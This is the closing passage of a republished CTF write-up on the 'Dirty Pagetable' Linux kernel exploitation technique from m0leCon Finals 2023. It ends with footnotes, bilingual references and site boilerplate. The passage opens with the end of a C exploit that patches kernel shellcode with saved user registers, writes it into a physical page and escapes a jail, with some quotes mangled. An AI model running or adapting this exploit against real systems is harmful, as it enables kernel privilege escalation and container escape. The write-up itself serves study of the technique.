0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};
void *p;
p = memmem(shellcode, sizeof(shellcode), \x11\x11\x11\x11\x11\x11\x11\x11, 8);
*(size_t*)p = getpid();
p = memmem(shellcode, sizeof(shellcode), \x22\x22\x22\x22\x22\x22\x22\x22, 8);
*(size_t*)p = (size_t)&win;
p = memmem(shellcode, sizeof(shellcode), \x33\x33\x33\x33\x33\x33\x33\x33, 8);
*(size_t*)p = user_cs;
p = memmem(shellcode, sizeof(shellcode), \x44\x44\x44\x44\x44\x44\x44\x44, 8);
*(size_t*)p = user_rflags;
p = memmem(shellcode, sizeof(shellcode), \x55\x55\x55\x55\x55\x55\x55\x55, 8);
*(size_t*)p = user_rsp;
p = memmem(shellcode, sizeof(shellcode), \x66\x66\x66\x66\x66\x66\x66\x66, 8);
*(size_t*)p = user_ss;
memcpy(wwwbuf + (phys_func & 0xfff), shellcode, sizeof(shellcode));
puts(“[+] GO!GO!”);
printf(%d\n, symlink(“/jail/x”, “/jail”));
puts(“[-] Failed…”);
close(fd);
getchar();
return 0;
}

Yay! 耶!

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

References 引用

1: Linux Slab Allocator – About slab allocator
1: Linux Slab Allocator – 关于 slab allocator

2: 手を動かして理解するLinux Kernel Exploit – About Dirty Cred
2:用双手理解 Linux 内核漏洞 – 关于 Dirty Cred

3: Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel – The original article explaining about Dirty Pagetable
3: Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel – 解释 Dirty Pagetable 的原始文章

4: DMA-BUF Heaps – About DMA-BUF Heap
4: DMA-BUF 堆 – 关于 DMA-BUF 堆

5: CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel – How to bypass nsjail
5:CoRJail:从 Null Byte Overflow 到 Docker Escape 利用 Linux 内核中的 poll_list 对象 – 如何绕过 nsjail

*1:Team name consists of st98, weak ptr-yudai, and keymoon.
*1:战队名称由st98、weak ptr-yudai、keymoon组成。

*2:We can actually call it multiple times due to the lack of mutex, but it’s not necessary.
*2:由于缺少互斥锁,我们实际上可以多次调用它,但这不是必需的。

*3:Allocation and release take place in the same function in this case, but it doesn’t matter since we will free all objects in ④ eventually.
*3:在这种情况下,分配和释放发生在同一个函数中,但这并不重要,因为我们最终会释放 (4) 中的所有对象。

*4:The file structure is actually much larger in size.
*4:文件结构实际上要大得多。

*5:Refer [3] for more details.
*5:有关详细信息,请参阅[3]。

 

原文始发于Hatena Blog:Understanding Dirty Pagetable – m0leCon Finals 2023 CTF Writeup

版权声明:admin 发表于 2023年12月12日 下午8:36。
转载请注明:Understanding Dirty Pagetable – m0leCon Finals 2023 CTF Writeup | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...